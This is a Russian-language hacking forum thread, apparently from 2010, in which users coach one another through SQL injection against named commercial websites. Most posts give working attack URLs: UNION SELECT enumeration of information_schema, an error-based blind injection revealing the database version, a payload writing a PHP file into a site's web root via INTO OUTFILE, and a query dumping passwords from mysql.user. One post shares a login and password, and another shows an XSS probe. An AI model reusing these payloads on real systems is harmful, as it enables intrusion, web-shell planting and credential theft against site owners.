20.02.2010, 18:48
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
Сообщение от [x60]unu
ахаха
column_anme+information_Schema.columns+where+table _name={hex table}
или or 'table'
Прочитал статью бы хоть  column_ name+ from+information_schema.columns+limit+0,1--
|
|
|
20.02.2010, 18:53
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от [Feldmarschall]
column_name+from+information_schema.columns+limit+0,1--
Так ты будешь получать все столбцы, и ты не будешь знать из какой они таблицы
|
|
|
|
20.02.2010, 20:16
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
С нами:
9424793
Репутация:
13
|
|
Сообщение от Seravin
Так ты будешь получать все столбцы, и ты не будешь знать из какой они таблицы
Не ругаемся господа
Login admin
Password sa
Всем спасибо))
|
|
|
|
20.02.2010, 20:23
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от Darren
Не ругаемся господа
Login admin
Password sa
Всем спасибо))
Да никто не ругается, просто туты надо читать! И кстати, я думаю, что это не от админки пароль
|
|
|
|
22.02.2010, 16:46
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от Darren
никак не могу подобрать названия таблиц.Нашёл orders но не могу подобрать столбцы. Доступа в INFORMATION_SCHEMA.TABLES и Coloms нет помогите раскрутить скулю. Help please
http://www.limenatural.co.uk/latest.asp?ID=&offset=&prod_id=8896%20union+select %201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,TABLE_NAME%20FROM%20INFORMATION_SCHE MA.TABLES--+
Если доступа к information_schema нету, выход - брут (перебор) столбцов. Вряд ли за тебя кто-то это сделает.
Сообщение от Strilo4ka
а по поводу етс/шадов на пути не посмотрел сори
Даже, если бы это была unix-подобная система, /etc/shadow не прочтешь, даже если юзер = root.
Последний раз редактировалось mailbrush; 22.02.2010 в 16:57..
Причина: слишком жесткая шутка была :)
|
|
|
|
28.02.2010, 02:30
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Сообщение от Darren
Доступа в коломс нет, но запрос выполняется -
http://www.parperfecto.com/able/events_view.php?eid=-10+union+select+column_name+from+nformation_Schema .columns%20--
Я знаю что существует таблица email со строкой id и mail но при выполнении такого запроса
http://www.parperfecto.com/able/events_view.php?eid=-10+union+select+mail+from+email%20--
Выводит обычное окно как без запроса, как это можно обойти?
Слепая
_http://www.parperfecto.com/able/events_view.php?eid=10/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)
Код:
Duplicate column name '5.0.77'
|
|
|
|
28.02.2010, 02:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
Сообщение от Darren
Доступа в коломс нет, но запрос выполняется -
http://www.parperfecto.com/able/events_view.php?eid=-10+union+select+column_name+from+nformation_Schema .columns%20--
i добавь к имени базы и появится)
Сообщение от .:[melkiy]:.
Слепая
_http://www.parperfecto.com/able/events_view.php?eid=10/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)
Код:
Duplicate column name '5.0.77'
проще наверно так)
http://www.parperfecto.com/able/events_view.php?eid=3+into+outfile+'/var/www/vhosts/parperfecto.com/httpdocs/yaneshell.php'+fields+enclosed+by+'<?phpinfo();?>'
http://www.parperfecto.com/yaneshell.php
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
|
06.03.2010, 19:41
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от v1d0qz
Кто знает как вывести int значение в mssql инже. Т.е. есть табличка которую нужно проверить на записать (т.е. update). Но так как там все значения int, не получается проверить даже по условию.
Пробывал cast(x+as+int), convert(int,x), и ещё кучу всего. Значения там точно есть. Вообщем у кого есть опыт по сабжу, прошу поделится.
ну если надо вывести int через провоцирование ошибки, то тогда наоборот пробовать convert(text,(запрос)) или convert(char,(запрос))
|
|
|
|
23.03.2010, 02:15
|
|
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
С нами:
11010660
Репутация:
439
|
|
Код:
http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=%3Cscript%3Ealert()%3C/script%3E
со скулем можно что-то накрутить? и какие здесь вообще есть варианты? |
|
|
|
23.03.2010, 12:40
|
|
Новичок
Регистрация: 20.12.2008
Сообщений: 24
С нами:
9152742
Репутация:
62
|
|
Сообщение от BrainDeaD
Код:
http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=%3Cscript%3Ealert()%3C/script%3E
со скулем можно что-то накрутить? и какие здесь вообще есть варианты?
Код:
http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=-1+union+select+1,2,3,password,5,6,7,8,9,10+from+mysql.user
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1919387){kind=avatar}
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1940584){kind=avatar}
Похожие темы
Комбинированный вид
